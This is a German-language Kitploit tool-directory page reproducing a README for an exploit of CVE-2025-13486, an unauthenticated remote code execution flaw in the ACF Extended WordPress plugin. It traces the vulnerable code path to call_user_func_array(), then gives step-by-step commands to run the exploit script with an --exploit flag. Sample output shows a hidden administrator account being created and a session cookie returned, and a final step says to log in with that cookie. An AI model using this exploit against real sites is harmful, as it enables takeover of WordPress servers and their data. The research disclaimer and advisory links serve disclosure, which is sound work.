Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-13486 — CVE-2025-13486 - Exploit für Remotecodeausführung & Privilegienerweiterung | Kitploit
Tools/GitHubGitHub/whattheslime/cve-2025-13486
Privilege EscalationSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubwhattheslime/cve-2025-13486

CVE-2025-13486

CVE-2025-13486 - Exploit für Remotecodeausführung & Privilegienerweiterung

Repository anzeigen
11vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-13486 Exploit

ACF Extended WordPress-Plugin – Remotecodeausführung & Privilegienerweiterung

Exploit für CVE-2025-13486, entdeckt von Marcin Dudek (dudekmar)

⚠️ Haftungsausschluss

Dieses Repository dient ausschließlich Forschungs- und Verteidigungszwecken. Der Autor übernimmt keine Verantwortung für den Missbrauch dieser Informationen.


📌 Übersicht

Das Advanced Custom Fields: Extended (ACFE)-Plugin für WordPress ist in den Versionen 0.9.0.5 bis 0.9.1.1 anfällig für Remote Code Execution (RCE).

Die Schwachstelle befindet sich in der Funktion prepare_form(), die benutzergesteuerte Eingaben akzeptiert und ohne ordnungsgemäße Validierung an call_user_func_array() weitergibt.

Dies ermöglicht es nicht authentifizierten Angreifern, in begrenztem Umfang beliebigen PHP-Code auf dem Server auszuführen, was dennoch ausreicht, um ein Administratorkonto zu erstellen und sich anzumelden.


🔬 Ursachenanalyse

Die Angriffskette ist wie folgt:

  1. includes/modules/form/module-form-front.php:24 -> Die Aktion wp_ajax_nopriv_acfe/form/render_form_ajax löst den Handler render_form_ajax aus.

  2. includes/modules/form/module-form-front.php:492 -> Der Filter acfe/form/prepare_form wird angewendet, wodurch die Funktion prepare_form() aufgerufen wird.

  3. includes/modules/form/module-form-front-render.php:151 -> Benutzergesteuerte $form-Daten werden direkt an call_user_func_array() übergeben.


🎯 Ausnutzung

  1. Python-Abhängigkeiten installieren:

    root@kitploit:~
    python3 -m venv venv
    venv/bin/pip install -r requirements.txt
    
  2. Ein verwundbares WordPress-Ziel identifizieren.

    Das Ziel muss eine Seite mit einem ACFE-generierten Formular enthalten.

    root@kitploit:~
    venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2
    

    Beispielausgabe:

    root@kitploit:~
    [2025-12-19] [11:00:46] [success] ACFE version is vulnerable: 0.9.1.1
    [2025-12-19] [11:03:30] [info] Use `--exploit` to perform exploitation.
    
  3. Das Skript erneut mit dem --exploit-Flag ausführen:

    root@kitploit:~
    venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2 --exploit
    

    Beispielausgabe:

    root@kitploit:~
    [2025-12-19] [11:00:13] [success] ACFE version is vulnerable: 0.9.1.1
    [2025-12-19] [11:00:13] [success] ACFE nonce found: c5d75e0d16
    [2025-12-19] [11:00:14] [success] Account created: adm1n:2c5c87a94a2c5c87a94a (administrator)
    [2025-12-19] [11:00:14] [success] Authentication succeded!
    [2025-12-19] [11:00:14] [info] Cookie: wordpress_4411def9d576984c8d78253236b2a62f=adm1n%7C1766311214%7CwVDbFsbQpjYMM6ckgEQ6gwr6dcjIRhmqYed7Y46YqHJ%7C2f7857614d5ebe1216922dab79c3a8be7164cccde0869e1545f3bfb17c5d2859
    

📚 Referenzen

  • https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-extended/advanced-custom-fields-extended-0905-0911-unauthenticated-remote-code-execution-in-prepare-form
  • https://sploitus.com/exploit?id=13551590-2822-5E83-9737-F55F4B2F9F82
Tool herunterladen
  • Das zurückgegebene WordPress-Authentifizierungs-Cookie verwenden, um sich als das neu erstellte Administratorkonto anzumelden.